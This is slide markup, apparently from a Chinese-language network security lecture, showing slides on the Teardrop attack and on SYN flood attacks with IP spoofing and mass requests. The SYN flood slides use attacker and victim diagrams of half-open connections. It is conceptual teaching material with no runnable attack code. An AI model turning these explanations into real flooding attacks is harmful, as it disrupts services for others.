            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Tear drop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{548339A1-3B75-48EB-A7C3-8D5353BF7291}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>170</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3978653896"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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AA74516C-6FCB-4A72-A221-5BE14987E8F9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" fontAlgn="base" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>171</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Flood</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52229" name="Group 407"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2632075" y="2916585"/>
            <a:ext cx="4367213" cy="744538"/>
            <a:chOff x="1488" y="1776"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35860" name="AutoShape 40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5861" name="Text Box 409"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1824" y="1920"/>
              <a:ext cx="190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1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN （</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>我可以连接吗？）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52230" name="Group 410"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2563813" y="3930998"/>
            <a:ext cx="4475162" cy="612775"/>
            <a:chOff x="1440" y="2496"/>
            <a:chExt cx="2496" cy="528"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35858" name="AutoShape 411"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="1440" y="249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5859" name="Text Box 412"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1694" y="2641"/>
              <a:ext cx="19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1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ACK （</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>可以）/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>SYN（</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>请确认！）</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="52231" name="Group 413"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2772123"/>
            <a:ext cx="2805113" cy="2894012"/>
            <a:chOff x="-299" y="1968"/>
            <a:chExt cx="1835" cy="1939"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35856" name="Picture 4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1968"/>
              <a:ext cx="1835"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7" name="Text Box 415"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="240" y="3600"/>
              <a:ext cx="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攻击者</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="组合 5"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6500813" y="2843560"/>
            <a:ext cx="2246312" cy="3136900"/>
            <a:chOff x="6500165" y="3480540"/>
            <a:chExt cx="2246626" cy="3136160"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35854" name="Picture 4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2260" y="3480540"/>
              <a:ext cx="2214531" cy="24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 Box 418"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6500165" y="5785662"/>
              <a:ext cx="2142700" cy="83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受害者</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="50000"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>分配资源维持半连接</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52243" name="Text Box 418"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="4434235"/>
            <a:ext cx="27130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1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>回复</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>次，第一次等待</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>秒，重新回复后等待时间翻倍，回复</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>次，共等待</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>98</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>秒</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52233" name="Text Box 419"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="2056160"/>
            <a:ext cx="359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伪造地址进行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SYN</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>请求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52239" name="AutoShape 421"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7280275" y="1268760"/>
            <a:ext cx="1539875" cy="1289050"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -26440"/>
              <a:gd name="adj2" fmla="val 72954"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>为何还没回应</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:srgbClr val="FF3300"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>？？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52236" name="Text Box 426"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2805113" y="5278785"/>
            <a:ext cx="35941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不能建立正常的连接</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>半连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="云形标注 29"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407988" y="1300510"/>
            <a:ext cx="1887537" cy="1511300"/>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rgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>就是让你白等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17590073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2231"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52231"/>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233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52233"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="522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nodeType="after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2229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52229"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24"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nodeType="after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2230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52230"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30"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nodeType="after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2243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5224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236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52236"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="42" fill="hold" nodeType="afterGroup">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52239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="52239"/>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3" grpId="0"/>
      <p:bldP spid="52233" grpId="0"/>
      <p:bldP spid="52239" grpId="0" animBg="1"/>
      <p:bldP spid="52236" grpId="0"/>
      <p:bldP spid="30"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977FD878-6B30-4F3F-89A8-602B4E09D99D}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" smtClean="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" fontAlgn="base" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>172</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SYN Flood(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>大量请求)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53252" name="Group 1052"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="179388" y="2130425"/>
            <a:ext cx="2516187" cy="2508250"/>
            <a:chOff x="-128" y="1968"/>
            <a:chExt cx="1602" cy="1996"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36911" name="Picture 10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 y="1968"/>
              <a:ext cx="1602"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2" name="Text Box 1054"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="240" y="3600"/>
              <a:ext cx="76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攻击者</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="53253" name="Group 1055"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6527800" y="3403600"/>
            <a:ext cx="2276475" cy="3084513"/>
            <a:chOff x="4176" y="1968"/>
            <a:chExt cx="1449" cy="1972"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36909" name="Picture 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0" name="Text Box 1057"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4512" y="3648"/>
              <a:ext cx="7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受害者</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53290" name="AutoShape 1060"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7056438" y="1916113"/>
            <a:ext cx="1822450" cy="1187450"/>
          </a:xfrm>
          <a:prstGeom prst="cloudCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5083"/>
              <a:gd name="adj2" fmla="val 75639"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF3300"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>这么多需要处理？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53255" name="Text Box 1062"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2695575" y="5956300"/>
            <a:ext cx="369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不能建立正常的连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="组合 3"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="596900" y="4614863"/>
            <a:ext cx="1820863" cy="1863725"/>
            <a:chOff x="596900" y="4614863"/>
            <a:chExt cx="1820863" cy="1863625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36907" name="Picture 1075" descr="j0301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900" y="4614863"/>
              <a:ext cx="182086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1076"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
